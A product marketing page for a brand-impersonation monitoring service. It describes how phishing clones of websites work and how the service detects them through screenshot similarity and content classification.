Skip to main content
Use case Brand owners · trust & safety · consumer brands

Brand impersonation monitoring

If you're a brand owner, attackers are cloning your website to harvest credentials and payment data from your own customers. PhishFence finds the clones, scores their visual similarity to the real thing, and surfaces the ones impersonating you on an hourly monitoring cadence.

The attacker pattern

An attacker downloads your website (trivially easy with browser dev tools or a tool like wget --mirror) and re-hosts it on a lookalike domain such as example-login.com or example-support.com. The clone is pixel-perfect: your logo, your color scheme, your copy, even your live chat widget. The only change is the form submit action, which now points to the attacker's collector.

Traffic gets driven via phishing email, paid search ads on your brand name, SMS, or social-media DMs. Customers who land believe they're on the real site. They sign in, enter payment details, or chase a fake support flow. By the time you notice, hundreds of credentials may already be in the attacker's database.

That's the website half. The other half is email impersonation: an attacker sends mail that appears to come from your domain (or a lookalike of it) without bothering to host a cloned site at all. A fake invoice from billing@example.com, a phony account-update notice, a vendor-fraud request to redirect ACH details. Defending the brand means defending both channels: lookalike domains (this page) and the email envelope (covered by the Email Security product).

The clone pipeline
example.com Real site Logo, copy, layout, forms scrape Pixel-perfect clone Identical UX POST to attacker's server host example-login.com Lookalike domain Valid TLS, looks legit Customer credentials & payment data harvested Email + paid ads + SMS drive the traffic

The other half: email impersonation

Lookalike sites need traffic to monetize. Email is one of the main ways attackers send it, and the email channel works as its own attack even when no cloned site exists. The attacker forges your envelope sender (or spoofs a lookalike domain), drops the message into your customer's inbox, and asks for a wire transfer or a password reset. SPF, DKIM, and DMARC are the protocols that let receivers reject those messages, but only if your records are configured correctly and you watch the reports.

PhishFence Email Security ingests your DMARC aggregate reports daily, enriches every sending IP with PTR + ASN + ESP attribution so you can tell Google Workspace from a Russian hosting provider at a glance, and pings you the moment a new sender shows up. The enforcement wizard then walks you from p=none to p=reject at the pace your real traffic can support, so attackers can't spoof your domain at scale.

Coverage map. Brand Protection (this page) finds the lookalike sites and the typosquat domains. Email Security finds the spoofed senders and the unaligned mail. They're sold separately, so buy one, both, or neither based on what your threat model needs. See pricing for both or read the email trust & compliance use case for the email-first attack pattern.

How PhishFence detects the website half

  1. 1

    Lookalike domain discovery

    Same nine-pattern variant engine as the typosquatting use case. The candidate set is identical; what differs is what we do with it.

  2. 2

    Screenshot capture for every live candidate

    For each candidate with a responding HTTPS server, PhishFence renders the page in a headless browser and stores the screenshot. The render captures the rendered DOM, not just the source, so client-side cloning is just as visible.

  3. 3

    Perceptual-hash visual similarity

    Each screenshot is hashed with a perceptual algorithm (pHash) and compared against your monitored-domain baseline. A near-zero hamming distance is a near-perfect clone; small distances reflect minor cosmetic changes to a clone, not unrelated sites.

  4. 4

    Content classification

    A classifier scans the captured page for high-signal content: login forms, payment forms, brand-name strings, support-flow language. A page that scores high on both visual similarity and content classification is almost certainly impersonating you.

  5. 5

    Combined signal elevation

    Combined scoring elevates the few real clones above the broader pool of registered-but-parked lookalikes so your dashboard isn't drowned in noise.

What it looks like in PhishFence

Captured page · examp1e.com 92% similar to baseline
https://examp1e.com/login

Sign in to your account

Enter your credentials to continue

Email

user@example.com

Password

••••••••••
Sign in

Forgot your password?

Captured 18m ago · click to enlarge in the live dashboard

Every live lookalike captured by PhishFence is rendered in a Chromium browser chrome frame on its alert detail page so you can see exactly what visitors would see, with the lock-icon state matching the captured TLS configuration.
Visual similarity breakdown · examp1e.com 92% ensemble
pHash
94%
Color
97%
SSIM
81%
CLIP
92%
By region
Logo
99%
Hero
88%
Content
71%
Footer
94%
Headline is the max of desktop and mobile viewports. CLIP runs against the customer's baseline embedding on every scan.
The visual similarity score is explicit and explainable. Four signals (pHash, Color, SSIM, CLIP) plus per-region breakdown let you see exactly which part of the page the clone copied.
Content classification · examp1e.com Confirmed Phishing
  • Password input field detected in form
  • Form action posts to non-brand domain (collect.tk)
  • Brand name found in <title> tag
  • Brand logo image pHash distance under threshold
  • Credit-card input field detected (autocomplete=cc-number)
Each alert carries a verdict (Confirmed Phishing / Likely Phishing / Suspected Impersonation / Registered Lookalike) plus the specific evidence strings that drove the classification. Useful when justifying the takedown to a registrar's abuse team.

Common pitfalls to avoid

  • Trusting URL alone. A defender who only checks domain names misses the page-content half of the signal. The danger here is not the URL but the rendered page; you have to actually look at what's being served.

  • Cloaking-aware attackers. Sophisticated clones serve a benign page to security scanners and the real phishing payload only to traffic arriving with the expected Referer header (paid ad / phishing email). Test with realistic referrers when validating an alert.

  • Re-baselining too late. If you redesign your real site without re-capturing your reference baseline, every screenshot diff suddenly scores high, including the legitimate one. PhishFence ships a one-click Recapture baseline button on the domain health page (Pro+) so you can add it to your launch checklist alongside the cache flush.

  • Forgetting the marketing-page surface. Clones often target your highest-conversion product page (a checkout, a sign-in flow) rather than your apex. PhishFence Pro auto-discovers your high-value paths (login, checkout, account) and baselines each one separately, so a cloned /login at attacker.com scores against the real /login instead of your homepage. Pro tracks 5 paths per domain, Business tracks 20.

Which PhishFence tier?

Pro at $99/month is the floor: screenshot capture and visual similarity scoring are Pro-tier features. Business at $499/month (100 domains) fits brands with multiple monitored domains, sub-brands, or product names that warrant separate lookalike sets and reference baselines.